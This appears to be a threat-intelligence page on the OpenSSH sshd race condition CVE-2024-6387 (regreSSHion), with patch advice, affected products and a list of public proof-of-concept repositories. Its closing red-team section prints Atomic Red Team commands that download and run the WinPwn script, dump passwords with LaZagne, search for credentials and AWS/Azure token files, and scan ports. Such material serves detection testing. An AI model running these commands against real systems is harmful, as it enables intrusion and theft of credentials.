CVE-2024-6387
Overview
This vulnerability is a race condition in the OpenSSH server (sshd) signal handling mechanism. Specifically, the flaw arises from improper synchronization when sshd processes certain signals during authentication timeout handling. The affected component is the sshd daemon, which can mishandle signals in a non-thread-safe manner under timing conditions triggered by authentication failures.
Vulnerability Description
A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period.
Impact
An unauthenticated remote attacker can exploit this race condition to cause sshd to execute unsafe operations, potentially leading to denial of service or unauthorized code execution within the sshd process. No user interaction or credentials are required to trigger the vulnerability, enabling remote compromise of systems running affected OpenSSH server versions. This can result in full system compromise, unauthorized access, or disruption of secure shell services critical for system administration.
Solution
Red Hat has issued multiple security advisories addressing this issue, including RHSA-2024:4312, RHSA-2024:4340, RHSA-2024:4389, RHSA-2024:4469, and RHSA-2024:4474, which provide patched OpenSSH packages. Users of affected products such as Ubuntu 23.10, 24.04 LTS, SonicWall SMA 6200 and 7200 firmware, and Arista EOS should apply the corresponding vendor patches immediately. Detailed patch instructions and updates are available via the Red Hat security advisory portal at https://access.redhat.com/errata/. No specific workarounds are recommended beyond applying these updates.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A recently identified security regression in OpenSSH's server component, specifically the sshd process, has raised significant concerns within the cybersecurity community. This vulnerability stems from a race condition that allows the server to handle signals in an unsafe manner. The flaw can be triggered by an unauthenticated remote attacker who fails to authenticate within a designated time frame. This creates a window of opportunity for malicious actors to exploit the vulnerability, potentially leading to unauthorized access or denial of service.
The primary attack vector involves an unauthenticated user attempting to connect to a vulnerable server running OpenSSH. By exploiting the race condition, an attacker could manipulate the timing of their connection attempts to interfere with the server's signal handling. This could result in the server behaving unpredictably, potentially allowing the attacker to execute arbitrary commands or disrupt service. The nature of the vulnerability means that it does not require prior authentication, making it particularly dangerous as it lowers the barrier for exploitation.
The real-world implications of this vulnerability are profound, especially for organizations that rely heavily on secure shell (SSH) for remote administration and secure file transfers. The potential for an attacker to gain unauthorized access to sensitive systems or data could lead to significant financial losses, reputational damage, and regulatory repercussions. Businesses that fail to address this vulnerability may find themselves exposed to data breaches, service outages, and the associated costs of incident response and recovery. Additionally, the widespread use of OpenSSH across various platforms, including popular distributions of Linux and network devices, amplifies the risk, as many organizations may be unaware of their exposure.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating and patching systems running OpenSSH is crucial, as vendors are likely to release security updates that address this specific issue. Additionally, employing intrusion detection systems (IDS) can help identify unusual patterns of SSH connection attempts that may indicate exploitation attempts. Network segmentation and the principle of least privilege should also be enforced to limit the potential impact of an exploit. Organizations should consider implementing rate-limiting measures on SSH connections to reduce the likelihood of successful exploitation through repeated connection attempts.
In conclusion, the security regression in OpenSSH's sshd presents a significant threat to organizations utilizing this widely adopted software. The nature of the vulnerability allows for exploitation by unauthenticated attackers, which poses a serious risk to the integrity and availability of affected systems. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can take proactive steps to mitigate the risks associated with this vulnerability. Continuous monitoring, timely updates, and robust security practices will be essential in safeguarding against this and similar threats in the future.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-6387, reflected by a modest uptick in telemetry signals. Although the EPSS score has marginally declined, indicating a subtle reduction in overall exploit likelihood, the emergence of multiple new proof-of-concept tools on public repositories underscores sustained attacker interest and accessibility to exploitation methods. This dynamic suggests that while broad-scale exploitation has not surged dramatically, the vulnerability remains actively probed and weaponized in limited contexts. For defenders, this evolving landscape highlights the necessity of maintaining vigilance, as the availability of diverse PoCs lowers the barrier for opportunistic attackers to leverage the race condition flaw. Consequently, the threat level remains high, with a nuanced shift toward targeted reconnaissance and exploitation rather than widespread campaign activity.
Update 2 — June 13, 2026
CSURFACE threat intelligence has identified a marked increase in the exploitability profile of CVE-2024-6387, reflected by a substantial rise in its EPSS score. This shift coincides with the emergence of multiple new proof-of-concept tools that streamline detection and exploitation, effectively lowering the technical barrier for adversaries. Our telemetry indicates that while broad-scale exploitation campaigns remain limited, there is a discernible uptick in targeted probing and opportunistic attacks leveraging these publicly available resources. This evolution underscores a growing risk that less sophisticated threat actors may now attempt to weaponize the vulnerability, potentially increasing the frequency of successful intrusions. Consequently, the threat level for affected Sonicwall Sma 6200 firmware deployments should be considered elevated, as the expanded exploit landscape and increased attacker accessibility amplify the likelihood of compromise in operational environments.
Update 3 — June 21, 2026
CSURFACE threat intelligence has identified a marked escalation in activity targeting CVE-2024-6387, evidenced by a significant increase in detection events and a sharp rise in the Exploit Prediction Scoring System (EPSS) score, which now approaches the maximum percentile. This surge correlates with the emergence of multiple new proof-of-concept exploits on public repositories, enhancing attacker capabilities to identify and exploit vulnerable OpenSSH servers remotely without authentication. The rapid growth in exploit availability lowers the technical barrier for threat actors, including less sophisticated groups, to conduct opportunistic attacks. Consequently, the risk to Sonicwall Sma 6200 firmware deployments has intensified, as the expanded exploit landscape and increased attacker accessibility amplify the likelihood of successful intrusions. Defenders should recognize this trend as an indicator of accelerating exploitation attempts, signaling an elevated threat environment that demands heightened vigilance.
Update 4 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-6387, evidenced by a significant uptick in related telemetry. This increase coincides with the emergence of additional proof-of-concept exploits and publicly available mitigation playbooks, which collectively lower the technical barriers for adversaries to weaponize the vulnerability. Although the EPSS score remains near maximum and stable, the surge in detection activity signals growing attacker interest and operationalization of the flaw. For defenders, this evolving landscape heightens the urgency to monitor for exploitation indicators, as the expanded exploit toolkit and increased attacker engagement raise the probability of successful compromise, particularly within Sonicwall Sma 6200 firmware environments. Consequently, the threat level should be considered elevated, reflecting an environment where opportunistic and potentially more sophisticated actors are increasingly capable of leveraging this regression to gain unauthorized access.
Affected Products (92)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonicwall | Sma 6200 Firmware | N/A |
cpe:2.3:o:sonicwall:sma_6200_firmware:-:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 7200 Firmware | N/A |
cpe:2.3:o:sonicwall:sma_7200_firmware:-:*:*:*:*:*:*:*
|
|
|
Arista | Eos | All |
cpe:2.3:o:arista:eos:*:*:*:*:*:*:*:*
|
|
|
Canonical | Ubuntu Linux | 23.10 |
cpe:2.3:o:canonical:ubuntu_linux:23.10:*:*:*:*:*:*:*
|
|
|
Canonical | Ubuntu Linux | 24.04 |
cpe:2.3:o:canonical:ubuntu_linux:24.04:*:*:*:lts:*:*:*
|
|
|
Almalinux | Almalinux | 9.0 |
cpe:2.3:o:almalinux:almalinux:9.0:-:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 6210 Firmware | N/A |
cpe:2.3:o:sonicwall:sma_6210_firmware:-:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 7210 Firmware | N/A |
cpe:2.3:o:sonicwall:sma_7210_firmware:-:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sma 8200v Firmware | N/A |
cpe:2.3:o:sonicwall:sma_8200v_firmware:-:*:*:*:*:*:*:*
|
|
|
Sonicwall | Sra Ex 7000 Firmware | N/A |
cpe:2.3:o:sonicwall:sra_ex_7000_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | A1k Firmware | N/A |
cpe:2.3:o:netapp:a1k_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | A70 Firmware | N/A |
cpe:2.3:o:netapp:a70_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | A90 Firmware | N/A |
cpe:2.3:o:netapp:a90_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | A700s Firmware | N/A |
cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | 8300 Firmware | N/A |
cpe:2.3:o:netapp:8300_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | 8700 Firmware | N/A |
cpe:2.3:o:netapp:8700_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | A400 Firmware | N/A |
cpe:2.3:o:netapp:a400_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | C400 Firmware | N/A |
cpe:2.3:o:netapp:c400_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | A250 Firmware | N/A |
cpe:2.3:o:netapp:a250_firmware:-:*:*:*:*:*:*:*
|
|
|
Netapp | 500f Firmware | N/A |
cpe:2.3:o:netapp:500f_firmware:-:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| OpenSSH server (sshd) 9.8p1 - Race Condition | Milad karimi | remote | linux | - | View |
GitHub PoCs (98)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zgzhang/cve-2024-6387-poc
a signal handler race condition in OpenSSH's server (sshd)
|
zgzhang | 492 | 183 | 2024-07-01 | View |
|
xaitax/CVE-2024-6387_Check
CVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH
|
xaitax | 523 | 99 | 2024-07-01 | View |
|
acrono/cve-2024-6387-poc
32-bit PoC for CVE-2024-6387 — mirror of the original 7etsuo/cve-2024-6387-poc
|
acrono | 380 | 85 | 2024-07-01 | View |
|
Karmakstylez/CVE-2024-6387
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
|
Karmakstylez | 183 | 44 | 2024-07-08 | View |
|
lflare/cve-2024-6387-poc
MIRROR of the original 32-bit PoC for CVE-2024-6387 "regreSSHion" by 7etsuo/cve-2024-6387-poc
|
lflare | 128 | 40 | 2024-07-01 | View |
|
l0n3m4n/CVE-2024-6387
PoC - Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (Scanner and Exploit)
|
l0n3m4n | 110 | 36 | 2024-07-02 | View |
|
filipi86/CVE-2024-6387-Vulnerability-Checker
This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URL...
|
filipi86 | 100 | 18 | 2024-07-09 | View |
|
xonoxitron/regreSSHion
CVE-2024-6387 (regreSSHion) Exploit (PoC), a vulnerability in OpenSSH's server (sshd) on glibc-based Linux systems.
|
xonoxitron | 66 | 12 | 2024-07-02 | View |
|
d0rb/CVE-2024-6387
This Python script exploits a remote code execution vulnerability (CVE-2024-6387) in OpenSSH.
|
d0rb | 50 | 15 | 2024-07-02 | View |
|
bigb0x/CVE-2024-6387
Bulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2006-5051 , CVE-2008-4109 and others.
|
bigb0x | 35 | 8 | 2024-07-01 | View |
|
sxlmnwb/CVE-2024-6387
Targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems.
|
sxlmnwb | 21 | 8 | 2024-07-03 | View |
|
YassDEV221608/CVE-2024-6387_PoC
|
YassDEV221608 | 17 | 9 | 2025-01-04 | View |
|
getdrive/CVE-2024-6387-PoC
PoC RCE in OpenSSH
|
getdrive | 24 | 2 | 2024-07-01 | View |
|
P4x1s/CVE-2024-6387
SSH RCE PoC CVE-2024-6387
|
P4x1s | 8 | 10 | 2024-07-02 | View |
|
thegenetic/CVE-2024-6387-exploit
CVE-2024-6387 exploit
|
thegenetic | 14 | 4 | 2024-07-02 | View |
|
devarshishimpi/CVE-2024-6387-Check
Fast, efficient, and reliable detection for the regreSSHion exploit. Scan multiple targets in seconds with zero dependen...
|
devarshishimpi | 14 | 3 | 2024-07-02 | View |
|
TAM-K592/CVE-2024-6387
Recently, the OpenSSH maintainers released security updates to fix a critical vulnerability that could lead to unauthent...
|
TAM-K592 | 14 | 2 | 2024-07-02 | View |
|
xonoxitron/regreSSHion-checker
Quickly identifies servers vulnerable to OpenSSH 'regreSSHion' (CVE-2024-6387).
|
xonoxitron | 10 | 6 | 2024-07-02 | View |
|
l-urk/CVE-2024-6387
Proof of concept python script for regreSSHion exploit.
|
l-urk | 12 | 4 | 2024-07-30 | View |
|
AiGptCode/ssh_exploiter_CVE-2024-6387
CVE-2024-6387 with auto ip scanner and auto expliot
|
AiGptCode | 12 | 2 | 2024-07-02 | View |
|
0x4D31/cve-2024-6387_hassh
HASSH fingerprints for identifying OpenSSH servers potentially vulnerable to CVE-2024-6387 (regreSSHion).
|
0x4D31 | 10 | 1 | 2024-07-05 | View |
|
Symbolexe/CVE-2024-6387
SSH Exploit for CVE-2024-6387 : RCE in OpenSSH's server, on glibc-based Linux systems
|
Symbolexe | 3 | 6 | 2024-07-03 | View |
|
wiggels/regresshion-check
CLI Tool to Check SSH Servers for Vulnerability to CVE-2024-6387
|
wiggels | 6 | 2 | 2024-07-01 | View |
|
MrR0b0t19/CVE-2024-6387-Exploit-POC
|
MrR0b0t19 | 4 | 2 | 2024-07-02 | View |
|
azurejoga/CVE-2024-6387-how-to-fix
Vulnerability remediation and mitigationCVE-2024-6387
|
azurejoga | 5 | 0 | 2024-07-05 | View |
|
kinu404/CVE-2024-6387
This is an altered PoC for d0rb/CVE-2024-6387. This takes glibc addresses and trys to exploit the CVE through them.
|
kinu404 | 4 | 1 | 2025-01-20 | View |
|
th3gokul/CVE-2024-6387
CVE-2024-6387 : Vulnerability Detection tool for regreSSHion Remote Unauthenticated Code Execution in OpenSSH Server
|
th3gokul | 4 | 1 | 2024-07-02 | View |
|
paradessia/CVE-2024-6387-nmap
CVE-2024-6387-nmap
|
paradessia | 4 | 1 | 2024-07-02 | View |
|
harshinsecurity/sentinelssh
SentinelSSH is an advanced, high-performance SSH vulnerability scanner written in Go. It's specifically designed to dete...
|
harshinsecurity | 4 | 0 | 2024-07-03 | View |
|
lala-amber/CVE-2024-6387
|
lala-amber | 4 | 0 | 2024-07-04 | View |
|
anhvutuan/CVE-2024-6387-poc-1
CVE-2024-6387, also known as RegreSSHion, is a high-severity vulnerability found in OpenSSH servers (sshd) running on gl...
|
anhvutuan | 2 | 2 | 2024-10-22 | View |
|
OHHDamnBRO/Noregressh
CVE-2024-6387 and more Checker and Exploiter - Reverse/Bind-Shell Support.
|
OHHDamnBRO | 2 | 2 | 2025-09-26 | View |
|
Ap0dexMe0/CVE-2024-6387
OpenSSH RCE Massive Vulnerable Scanner
|
Ap0dexMe0 | 2 | 1 | 2024-07-15 | View |
|
PrincipalAnthony/CVE-2024-6387-Updated-x64bit
Private x64 RCE exploit for CVE-2024-6387 [02.07.2024] from exploit.in
|
PrincipalAnthony | 3 | 0 | 2024-07-02 | View |
|
BrandonLynch2402/cve-2024-6387-nuclei-template
|
BrandonLynch2402 | 3 | 0 | 2024-07-02 | View |
|
awusan125/test_for6387
test code for cve-2024-6387
|
awusan125 | 3 | 0 | 2024-12-19 | View |
|
ACHUX21/checker-CVE-2024-6387
|
ACHUX21 | 2 | 1 | 2024-07-02 | View |
|
4lxprime/regreSSHive
rewrited SSH Exploit for CVE-2024-6387 (regreSSHion)
|
4lxprime | 0 | 3 | 2024-07-04 | View |
|
passwa11/cve-2024-6387-poc
|
passwa11 | 1 | 2 | 2024-07-01 | View |
|
RickGeex/CVE-2024-6387-Checker
CVE-2024-6387-Check is a streamlined and efficient tool created to detect servers operating on vulnerable versions of Op...
|
RickGeex | 2 | 1 | 2024-07-02 | View |
|
ThatNotEasy/CVE-2024-6387
OpenSSH RCE Massive Vulnerable Scanner
|
ThatNotEasy | 2 | 1 | 2024-07-15 | View |
|
muyuanlove/CVE-2024-6387fixshell
|
muyuanlove | 2 | 0 | 2024-07-02 | View |
|
grupooruss/CVE-2024-6387
regreSSHion vulnerability in OpenSSH CVE-2024-6387 Testing Script
|
grupooruss | 2 | 0 | 2024-07-02 | View |
|
sardine-web/CVE-2024-6387-template
Quick regreSSHion checker (based on software version) for nuclei CVE-2024-6387
|
sardine-web | 2 | 0 | 2024-07-05 | View |
|
prelearn-code/CVE-2024-6387
|
prelearn-code | 2 | 0 | 2024-07-25 | View |
|
identity-threat-labs/CVE-2024-6387-Vulnerability-Checker
This Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URL...
|
identity-threat-labs | 2 | 0 | 2024-08-28 | View |
|
turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker
Welcome to the CVE-2024-6387 OpenSSH Vulnerability Checker repository! This project offers multiple scripts to check th...
|
turbobit | 1 | 1 | 2024-07-04 | View |
|
sardine-web/CVE-2024-6387_Check
A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lea...
|
sardine-web | 1 | 1 | 2024-07-04 | View |
|
ahlfors/CVE-2024-6387
|
ahlfors | 2 | 0 | 2024-07-02 | View |
|
shamo0/CVE-2024-6387_PoC
Script for checking CVE-2024-6387 (regreSSHion)
|
shamo0 | 1 | 1 | 2024-07-02 | View |
|
betancour/OpenSSH-Vulnerability-test
OpenSSH CVE-2024-6387 Vulnerability Checker
|
betancour | 2 | 0 | 2024-07-02 | View |
|
oseasfr/Scanner_CVE_OpenSSH
Scanner para identificação de servidores com softwares SSH possivelmente vulnerável às CVEs CVE-2024-6387 e CVE-2023-487...
|
oseasfr | 1 | 0 | 2026-05-21 | View |
|
7etsuo/cve-2024-6387-poc
a signal handler race condition in OpenSSH's server (sshd)
|
7etsuo | 1 | 0 | 2024-07-01 | View |
|
X-Projetion/CVE-2023-4596-OpenSSH-Multi-Checker
CVE-2024-6387-checker is a tool or script designed to detect the security vulnerability known as CVE-2024-6387 OpenSSH. ...
|
X-Projetion | 1 | 0 | 2024-08-06 | View |
|
identity-threat-labs/Article-RegreSSHion-CVE-2024-6387
In an era where digital security is crucial, a new vulnerability in OpenSSH, identified as CVE-2024-6387, has drawn the ...
|
identity-threat-labs | 1 | 0 | 2024-08-29 | View |
|
mrmtwoj/CVE-2024-6387
regreSSHion is a security tool designed to test for vulnerabilities related to CVE-2024-6387, specifically focusing on S...
|
mrmtwoj | 0 | 1 | 2024-07-09 | View |
|
redux-sibi-jose/mitigate_ssh
OpenSSH vulnerability CVE-2024-6387
|
redux-sibi-jose | 1 | 0 | 2024-07-11 | View |
|
R4Tw1z/CVE-2024-6387
This script, created by R4Tw1z, is designed to scan IP addresses to check if they are running a potentially vulnerable v...
|
R4Tw1z | 1 | 0 | 2024-07-02 | View |
|
xiw1ll/CVE-2024-6387_Checker
Nuclei template to detect CVE-2024-6387. All latest patched versions are excluded.
|
xiw1ll | 1 | 0 | 2025-07-23 | View |
|
teamos-hub/regreSSHion
This is a POC I wrote for CVE-2024-6387
|
teamos-hub | 1 | 0 | 2024-07-02 | View |
|
alex14324/ssh_poc2024
An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server
|
alex14324 | 1 | 0 | 2024-07-31 | View |
|
rumochnaya/openssh-cve-2024-6387.sh
openssh-cve-2024-6387.sh
|
rumochnaya | 1 | 0 | 2024-07-02 | View |
|
xristos8574/regreSSHion-nmap-scanner
A bash script for nmap to scan for vulnerable machines in regards to the latest CVE-2024-6387
|
xristos8574 | 1 | 0 | 2024-07-02 | View |
|
n1cks0n/Test_CVE-2024-6387
Test_CVE-2024-6387 is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH
|
n1cks0n | 1 | 0 | 2024-07-02 | View |
|
s1d6point7bugcrowd/CVE-2024-6387-Race-Condition-in-Signal-Handling-for-OpenSSH
|
s1d6point7bugcrowd | 0 | 1 | 2024-08-19 | View |
|
HadesNull123/CVE-2024-6387_Check
RCE OpenSSH CVE-2024-6387 Check and Exploit
|
HadesNull123 | 0 | 1 | 2024-08-26 | View |
|
SkyGodling/CVE-2024-6387-POC
|
SkyGodling | 0 | 1 | 2024-07-02 | View |
|
vuducmanhno100-cloud/CVE-2024-6387
CVE-2024-6387 POC (Currently being edited)
|
vuducmanhno100-cloud | 0 | 0 | 2026-05-22 | View |
|
particle99/CVE-2024-6387-POC
fork for proof of concept of the regresshion vulnerability
|
particle99 | 0 | 0 | 2024-07-02 | View |
|
CiderAndWhisky/regression-scanner
Used to detect ssh servers vulnerable to CVE-2024-6387. Shameless robbery from https://github.com/bigb0x/CVE-2024-6387 u...
|
CiderAndWhisky | 0 | 0 | 2024-07-02 | View |
|
daniel-odrinski/CVE-2024-6387-Mitigation-Ansible-Playbook
An Ansible Playbook to mitigate the risk of RCE (CVE-2024-6387) until platforms update OpenSSH to a non-vulnerable versi...
|
daniel-odrinski | 0 | 0 | 2024-07-02 | View |
|
no-one-sec/CVE-2024-6387
开箱即用的AK47
|
no-one-sec | 0 | 0 | 2024-07-02 | View |
|
edsonjt81/CVE-2024-6387_Check
|
edsonjt81 | 0 | 0 | 2024-07-02 | View |
|
t3rry327/cve-2024-6387-poc
|
t3rry327 | 0 | 0 | 2024-07-03 | View |
|
jocker2410/CVE-2024-6387_poc
|
jocker2410 | 0 | 0 | 2024-07-03 | View |
|
JackSparrowhk/ssh-CVE-2024-6387-poc
CVE-2024-6387_Check 是一款轻量级、高效的工具,旨在识别运行易受攻击的 OpenSSH 版本的服务器,专门针对最近发现的regreSSHion漏洞 (CVE-2024-6387)。此脚本有助于快速扫描多个 IP 地址、域名...
|
JackSparrowhk | 0 | 0 | 2024-07-04 | View |
|
dream434/CVE-2024-6387
OpenSSH a publié un avis de sécurité concernant la vulnérabilité critique CVE-2024-6387. Cette vulnérabilité permet à u...
|
dream434 | 0 | 0 | 2024-07-14 | View |
|
almogopp/OpenSSH-CVE-2024-6387-Fix
A Bash script to mitigate the CVE-2024-6387 vulnerability in OpenSSH by providing an option to upgrade to a secure versi...
|
almogopp | 0 | 0 | 2024-08-20 | View |
|
zenzue/CVE-2024-6387-Mitigation
Mitigation Guide for CVE-2024-6387 in OpenSSH
|
zenzue | 0 | 0 | 2024-07-02 | View |
|
hssmo/cve-2024-6387_AImade
cve-2024-6387_AImade
|
hssmo | 0 | 0 | 2024-07-02 | View |
|
imv7/CVE-2024-6387
|
imv7 | 0 | 0 | 2024-07-05 | View |
|
kubota/CVE-2024-6387-Vulnerability-Checker
This Rust Code is designed to check SSH servers for the CVE-2024-6387 vulnerability
|
kubota | 0 | 0 | 2024-07-09 | View |
|
DimaMend/cve-2024-6387-poc
|
DimaMend | 0 | 0 | 2024-07-10 | View |
|
YassDEV221608/CVE-2024-6387
|
YassDEV221608 | 0 | 0 | 2024-11-24 | View |
|
Mufti22/CVE-2024-6387-checkher
|
Mufti22 | 0 | 0 | 2024-07-02 | View |
|
CognisysGroup/CVE-2024-6387-Checker
|
CognisysGroup | 0 | 0 | 2024-07-02 | View |
|
Doux-x/CVE-2024-6387-analysis
CVE-2024-6387 OpenSSH 信号竞争漏洞(regreSSHion)分析报告及检测脚本
|
Doux-x | 0 | 0 | 2026-03-30 | View |
|
dawnl3ss/CVE-2024-6387
|
dawnl3ss | 0 | 0 | 2024-07-02 | View |
|
FerasAlrimali/CVE-2024-6387-POC
SSHd cve-2024-6387-poc
|
FerasAlrimali | 0 | 0 | 2024-07-01 | View |
|
jack0we/CVE-2024-6387
|
jack0we | 0 | 0 | 2024-07-01 | View |
|
vkaushik-chef/regreSSHion
Chef Inspec profile for checking regreSSHion vulnerability CVE-2024-6387
|
vkaushik-chef | 0 | 0 | 2024-07-08 | View |
|
dgourillon/mitigate-CVE-2024-6387
|
dgourillon | 0 | 0 | 2024-07-09 | View |
|
sms2056/CVE-2024-6387
|
sms2056 | 0 | 0 | 2024-07-04 | View |
|
invaderslabs/regreSSHion-CVE-2024-6387-
Provides instructions for using the script to check if your OpenSSH installation is vulnerable to CVE-2024-6387
|
invaderslabs | 0 | 0 | 2024-07-04 | View |
|
moften/regreSSHion-CVE-2024-6387
CVE-2024-6387
|
moften | 0 | 0 | 2025-09-08 | View |
|
Ngagne-Demba-Dia/CVE-2024-6387-corrigee
|
Ngagne-Demba-Dia | 0 | 0 | 2025-12-08 | View |
|
Remnant-DB/CVE-2024-6387
OpenSSH regreSSHion (CVE-2024-6387) Lab
|
Remnant-DB | 0 | 0 | 2026-03-09 | View |
|
kaleth4/CVE-2024-6387
|
kaleth4 | 0 | 0 | 2026-03-31 | View |
Threat Feed
15 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-29 | Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions |
34%
|
High | High | |
| CAPEC-26 | Leveraging Race Conditions |
32%
|
High | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
